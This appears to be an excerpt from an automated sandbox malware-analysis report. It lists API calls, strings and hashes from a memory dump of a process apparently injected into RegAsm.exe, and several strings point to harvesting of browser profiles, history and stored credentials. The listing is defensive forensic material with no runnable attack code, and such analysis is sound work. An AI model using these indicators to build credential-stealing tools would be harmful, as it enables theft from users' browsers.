                                                                                                                                                                                                • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                                                                • API String ID: 4111938811-1819279800
                                                                                                                                                                                                • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                                                                • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                                                                                                                • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                                                                • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 0040129E
                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                                                                                                • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                                                                                                • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                                                                                                • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                                                                                                • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                                                                                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                                                                                                • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 829165378-0
                                                                                                                                                                                                • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                                                                • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                                                                                                                • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 00404172
                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                • wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                • wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                • memset.MSVCRT ref: 00404200
                                                                                                                                                                                                • memset.MSVCRT ref: 00404215
                                                                                                                                                                                                • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                • wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                • memset.MSVCRT ref: 0040426E
                                                                                                                                                                                                • memset.MSVCRT ref: 004042CD
                                                                                                                                                                                                • memset.MSVCRT ref: 004042E2
                                                                                                                                                                                                • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                                                                                                • wcscpy.MSVCRT ref: 00404311
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                                                                                                • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                                                                                                • API String ID: 2454223109-1580313836
                                                                                                                                                                                                • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                                                                • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                                                                                                • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                                                                • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                                                                                                • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                                                                                                • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                                                                                                • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                                                                                                                • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                                                                                                • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                                                                                                • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                                                                                                • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                                                                                                • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                                                                                                  • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                                                                                                  • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                                                                                                • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                                                                                                • API String ID: 4054529287-3175352466
                                                                                                                                                                                                • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                                                                • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                                                                • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                                                                                                • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                                • API String ID: 3143752011-1996832678
                                                                                                                                                                                                • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                                                                                                                • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                                                                                                                                • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                                                                                                                • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                                                                • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                                • API String ID: 1607361635-601624466
                                                                                                                                                                                                • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                                                                • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                                                                                                                • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                                                                • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                                                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                                • API String ID: 2000436516-3842416460
                                                                                                                                                                                                • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                                                • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                                                • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                                                                                                  • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                                                                                                  • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                                  • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                                  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                                  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                                  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                                  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                                  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                                  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                                  • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                                                                                                • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                                                                                                • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                                                                                                • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                                                                                                • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                                                                                                • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                                                                                                • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                                                                                                • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                                                                                                • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                                                                                                • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1043902810-0
                                                                                                                                                                                                • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                                • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                                                                                                                • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                                • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                • free.MSVCRT ref: 0040E49A
                                                                                                                                                                                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                                • memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                                  • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                                                • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                                • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                                                                                                                                                                                • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E407
                                                                                                                                                                                                • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E422
                                                                                                                                                                                                • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E43D
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                                                                                                • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                                                                • API String ID: 3849927982-2252543386
                                                                                                                                                                                                • Opcode ID: f8736963c1e408997af279cfc298981fa7ef611c2197f5f9bddedf84c8b339a3
                                                                                                                                                                                                • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                                                                                                • Opcode Fuzzy Hash: f8736963c1e408997af279cfc298981fa7ef611c2197f5f9bddedf84c8b339a3
                                                                                                                                                                                                • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                                                                                                                                                                • _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                                • wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                                                                                                • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                                                                • API String ID: 2899246560-1542517562
                                                                                                                                                                                                • Opcode ID: 79e099bb23a1393a239ae01641405c8b767ccdf12231d4bb76dd8066c9d8bd92
                                                                                                                                                                                                • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                                                                                                                • Opcode Fuzzy Hash: 79e099bb23a1393a239ae01641405c8b767ccdf12231d4bb76dd8066c9d8bd92
                                                                                                                                                                                                • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 004091E2
                                                                                                                                                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                                • memcmp.MSVCRT ref: 004092D9
                                                                                                                                                                                                • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                                                                                                • memcmp.MSVCRT ref: 0040933B
                                                                                                                                                                                                • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                                                                                                • memcmp.MSVCRT ref: 00409411
                                                                                                                                                                                                • memcmp.MSVCRT ref: 00409429
                                                                                                                                                                                                • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                                                                                                • memcmp.MSVCRT ref: 004094AC
                                                                                                                                                                                                • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3715365532-3916222277
                                                                                                                                                                                                • Opcode ID: f920f79086ebd03163bb660580745ba542768fbf6859bbba0dc8aac637b41020
                                                                                                                                                                                                • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                                                                                • Opcode Fuzzy Hash: f920f79086ebd03163bb660580745ba542768fbf6859bbba0dc8aac637b41020
                                                                                                                                                                                                • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 0040DBCD
                                                                                                                                                                                                • memset.MSVCRT ref: 0040DBE9
                                                                                                                                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                  • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                                                                                                                                                                  • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                                  • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                                • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                                                                                                                • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                                                                                                                • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                                                                                                                • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                                                                                                                                                • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                                                                                                                                                • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                                                                                                                • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                                                                • API String ID: 3330709923-517860148
                                                                                                                                                                                                • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                                                                                                                • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                  • Part of subcall function 0040CC26: CloseHandle.KERNEL32(?), ref: 0040CC98
                                                                                                                                                                                                  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                                • memset.MSVCRT ref: 0040806A
                                                                                                                                                                                                • memset.MSVCRT ref: 0040807F
                                                                                                                                                                                                • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                                                                                                                • memset.MSVCRT ref: 004081E4
                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                                                                                                                  • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                                                                                                                  • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                                                                                                                  • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                                                                                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                                                                                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                                                                                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                                                                                                  • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                                  • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                                  • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
